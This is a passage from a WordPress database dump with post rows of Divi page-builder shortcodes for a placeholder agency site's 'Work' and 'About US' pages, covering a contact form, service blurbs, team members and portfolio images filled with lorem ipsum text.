animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"4.5.2\" text_font=\"Montserrat|on|||\" text_text_color=\"#d4b068\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\" hover_enabled=\"0\"]04\r[/et_pb_text][et_pb_cta title=\"Ninza - Branding Identity\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"3.16\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim, ultrices at ante sollicitudin, faucibus hendrerit nunc. Nullam tempor nulla eu imperdiet interdum.\r[/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" hover_enabled=\"0\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Work','','inherit','closed','closed','','396-revision-v1','','','2020-08-04 19:17:28','2020-08-04 19:17:28','',396,'https://wthtest1.in8.cdn-alpha.com/2020/08/04/396-revision-v1/',0,'revision','',0);
INSERT INTO `wp_posts` VALUES (415,1,'2020-08-04 19:23:40','2020-08-04 19:23:40','[et_pb_section fb_built=\"1\" admin_label=\"Page Header\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"67px|0px|67.1875px|0px|false|false\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>About US</h1>\r[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"About Us Section\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/business_01.jpg\" custom_margin=\"|5%||5%\" custom_margin_tablet=\"\" custom_margin_phone=\"|0px||0px\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%|||\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"5%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-200px\" box_shadow_color=\"#ffffff\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"About Us Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"27px|0px|0px|0px\"][et_pb_column type=\"2_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_color=\"#f7f7f7\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"10%|10%|10%|10%\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_vertical=\"15px\" box_shadow_blur=\"45px\" box_shadow_color=\"rgba(0,0,0,0.15)\" locked=\"off\"]<h2>Building the future</h2>\r\n<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis iste natus sit voluptatem accusantium doloremque laudantium totam rem aperiam, eaque ipsa quae ab.</p>\r\n<p>Illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. <span style=\"font-size: 16px;\">Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit, sed quia non numquam eius modi tempora incidunt ut labore et dolore magnam aliquam quaerat voluptatem.</span></p>\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"UX Research\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim.</span></p>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Brand Identity\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim.</span></p>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Development\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim.</span></p>\r[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim.</span></p>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim.</span></p>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Photography\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim.</span></p>\r[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"110px|0px|110px|0px\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"4%\" animation_starting_opacity=\"100%\" locked=\"off\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_font=\"||||||||\" text_text_color=\"#353740\" text_font_size=\"24px\" text_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. Fusce ipsum enim, <strong>ultrices at ante sollicitudin</strong>, faucibus hendrenunc. Nullam tempor nulla eu imperdiet interdum.</span></p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.5.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#d4b068\" background_color_gradient_end=\"#ffffff\" background_color_gradient_start_position=\"30%\" background_color_gradient_end_position=\"30%\" custom_padding=\"0px||110px|\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"0px|0px|0px|0px\" animation_direction=\"top\" hover_enabled=\"0\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=GQB6K7Dozms\" image_src=\"//i.ytimg.com/vi/GQB6K7Dozms/hqdefault.jpg\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" hover_enabled=\"0\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Team Member Section\" _builder_version=\"3.22\" custom_padding=\"110px||60px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#353740\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Fearless Leaeders</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||15px|\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Eduard Ungureanu\" position=\"Project Manager\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-01.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Christina Foster\" position=\"Creative Director\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-06.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"100ms\" locked=\"off\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Jason Wardak\" position=\"Visual Media\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-04.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"200ms\" locked=\"off\"][/et_pb_team_member][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Other Recent Works Section\" _builder_version=\"3.22\" background_color=\"#353740\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#d4b068\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_color=\"#d4b068\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#d4b068\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>our Work</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#f7f7f7\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" admin_label=\"Other Recent Works Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-06.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" 